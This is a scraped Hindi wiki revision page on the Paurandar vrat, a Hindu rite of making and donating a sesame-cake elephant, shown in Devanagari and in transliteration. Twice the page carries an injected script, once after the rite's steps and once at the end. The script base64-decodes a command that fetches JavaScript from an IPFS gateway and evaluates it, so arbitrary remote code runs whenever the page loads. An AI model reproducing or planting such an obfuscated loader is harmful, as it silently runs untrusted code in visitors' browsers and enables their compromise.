Difference between revisions of "पौरन्दर व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 2: Line 2:
 
*[[पंचमी]] को तिल की खली से [[हाथी]] की आकृति बनानी चाहिए, उसे सोने से अलंकृत करना चाहिए, उस पर अंकुश के साथ पीलवान बैठाना चाहिए; हाथी पर लाल वस्त्र रखे जाने चाहिए, उसके दाँत को किसी पीतल के पात्र में या कुण्ड में रखना चाहिए।
 
*[[पंचमी]] को तिल की खली से [[हाथी]] की आकृति बनानी चाहिए, उसे सोने से अलंकृत करना चाहिए, उस पर अंकुश के साथ पीलवान बैठाना चाहिए; हाथी पर लाल वस्त्र रखे जाने चाहिए, उसके दाँत को किसी पीतल के पात्र में या कुण्ड में रखना चाहिए।
 
*हाथी को दान के रूप में किसी [[ब्राह्मण]] एवं उसकी पत्नी को मालाओं, आभूषणों, कुण्डलों एवं नवीन वस्त्रों के साथ देना चाहिए।
 
*हाथी को दान के रूप में किसी [[ब्राह्मण]] एवं उसकी पत्नी को मालाओं, आभूषणों, कुण्डलों एवं नवीन वस्त्रों के साथ देना चाहिए।
*ऐसा करने से कर्ता इन्द्रलोक में दीर्घ काल तक रहता है।<ref>हेमाद्रि (व्रत0 1, 567-568, भविष्यपुराण से उद्धरण)</ref>
+
*ऐसा करने से कर्ता इन्द्रलोक में दीर्घ काल तक रहता है।<ref>हेमाद्रि (व्रत0 1, 567-568, भविष्यपुराण से उद्धरण</ref>
  
  

Latest revision as of 12:52, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • panchami ko til ki khali se hathi ki akriti banani chahie, use sone se alankrit karana chahie, us par aankush ke sath pilavan baithana chahie; hathi par lal vastr rakhe jane chahie, usake daant ko kisi pital ke patr mean ya kund mean rakhana chahie.
  • hathi ko dan ke roop mean kisi brahman evan usaki patni ko malaoan, abhooshanoan, kundaloan evan navin vastroan ke sath dena chahie.
  • aisa karane se karta indralok mean dirgh kal tak rahata hai.[1]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 1, 567-568, bhavishyapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>